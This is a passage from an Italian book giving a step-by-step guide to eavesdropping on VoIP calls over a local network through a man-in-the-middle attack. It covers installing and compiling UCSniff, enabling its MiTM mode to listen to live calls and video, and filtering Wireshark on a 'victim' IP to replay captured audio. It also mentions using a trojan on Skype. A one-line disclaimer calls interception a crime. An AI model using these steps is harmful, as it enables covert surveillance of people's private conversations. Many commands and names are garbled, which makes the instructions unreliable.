Centri Commerciali o Aeroporti, il prezzo della connessione ad
Internet viene azzerato. In questo bel meccanismo, sorge un
dubbio; dal momento che spesso la rete ha delle “falle”, siamo
sicuri che le nostre chiamate VOIP non vengano intercettate ?
Prima di spiegare come è possibile intercettare tali chiamate,
spieghiamo come funziona questa tecnologia. Il VOIP funziona
attraverso la codifica del segnale vocale da analogico a digitale,
che viene compresso attraverso i codec audio e inoltrato tra i due
client attraverso dei pacchetti soket. Il trasporto dei dati, sfrutta
alcuni protocolli, quali il RTP ( Real-Time Transport Protocol ) su
UDP (User Datagram Protocol ) e IP ( Internet Protocol ).
Titolo di metà pagina: L'attacco main the middle mette a rischio la
sicurezza
Il problema principale delle comunicazioni attraverso il VOIP è la
possibile intercettazione dei pacchetti scambiati dai due interlocutori
attraverso la tecnica del main in the middle.
Esso è un tipo di attacco nel quale l'Hacker è in grado di leggere,
inserire o modificare messaggi tra le due parti senza che nessuna
delle due si accorga che sia stata compromessa la sicurezza
dell'invio dei dati. L'attaccante deve essere in grado di osservare,
intercettare e replicare verso la destinazione prestabilita il transito
dei messaggi tra le due vittime. In sostanza l'Hacker si pone in
mezzo alla comunicazione tra i due interlocutori ed è quindi in
137
grado di ascoltare la conversazione. I programma da utilizzare sono
due: Ucniff e Wireshark . Il primo permette anche di poter
intercettare i flussi video, come ad esempio webcam ip collegato
alla rete, il secondo è forse il migliore sniffer presente in
circolazione, poiché permette di raccogliere qualsiasi dato che
transita in rete, dai pacchetti HTTP a quelli VOIP. Sebbene
entrambe le applicazioni sono disponibili sia per Windows che per
Linux, è preferibile usarle con il sistema del pinguino per via della
limitazione hardware del primo sistemo operativo. Inoltre, è bene
ricordare che è un reato penale intercettare le chiamate, pertanto
questa guida ha solo lo scopo di mostrare alcune falle di questa
tecnologia.
Prima di scaricare il file eseguibile, dobbiamo installare dei
138
pacchetti da terminale Linux; per farlo digitiamo prima sudo apt-get
update, apt-get install build essential e in seguito questi pacchetti
zlib1g-zlib1g-dev liblzo2-dev, libpcap0.8-dev libnet1dev,libasound2-dev,ibbz2-dev, digitando apt-get install “nome
pacchetto” in modo sequenziale.
Installiamo anche i pacchetti libx11-dev, livxext-dev, libfreetype6dev, vlc e libvlc-dev, per avere una interfaccia grafica.
Scarichiamoa dal sito http://ucsniff.sourceforge.net/ l'ultima versione
disponibile la 3.20. Una volta scaricata l'applicazione, scompattiamo
il file con tar -zxvf ucsniff-3.20.tar.gz e ci spostiamo all'interno di
questa libreria con cd ucsniff-3.20.
139
Ora compiliamo il tutto con ../configure --enable-libvlc –enable-gui e
make e make install inseriti in mo di sequenziale. Per quanto
riguarda Wireshark se non fosse già presente, basta andare sul sito
http://www.wireshark.org/, scaricare l'applicazione e premere due
volte per installarla.
140
Per aprire l'applicazione, basta digitare da terminale ucsniff -G e si
aprirà una schermata simile a quella in foto. Ora impostiamo la
nostra periferica di rete che stiamo usando e spuntiamo la voce
MiTM e premendo il comando Start Ucsniff, diamo inizio
all'operazione.
141
Ora ci spostiamo nel tab “Active Calls” e potremo vedere le
chiamate che stanno avvenendo nella rete locale. Sotto la voce
“Live Monitor” premendo il comando “Start” è possibile ascoltare la
chiamata !
Se invece voglia vedere il flusso video presente nella rete,
rimaniamo nella voce Active Calls, ma in questo caso scegliamo i
142
pacchetti video e premiamo sempre la voce start per vedere cosa
sta accadendo. Attraverso il programma VLC, è possibile avere uno
streaming in diretta !
Sebbene Ucsniff richieda solo alcuni parametri per poter
funzionare, una soluzione più semplice è quella di usare Wireshark.
Esso un sniffer che raccoglie tutti i dati che passano nella rete, tra
cui le chiamate VOIP. Per aprire l'applicazione basta digitare da
terminale: sudo wireshark
143
Una volta selezionata la periferica di rete che stiamo usando, eth0
per la LAN, wlan0 o mon0 per la WLAN, digitiamo come filtro not
broadcast and not multicast and host “l'indirizzo ip della vittima” e
premiamo il comando “start” per far partire il live-capturing.
144
Una volta terminata la scansione dei pacchetti in rete, ci spostiamo
in Statistics-VOIP e potremo ascoltare il flusso dati che abbiamo
catturato. Davvero semplice con Wireshark !
e Skype ?
Sebbene le conversazioni Skype viaggino abbastanza protette
durante il tragitto che unisce i due interlocutori, c'è un momento in
cui le parole di entrambi i partecipanti (ma su Skype si può
chiamare anche più di un utente per volta) sono liberamente e
totalmente accessibili: quando vengono riprodotte e raccolte su uno
dei due computer o dispositivi utilizzati per la chiamata, attraverso
un classico trojan è possibile intercettare anche queste chiamate !
145
Scarica

Libro terminato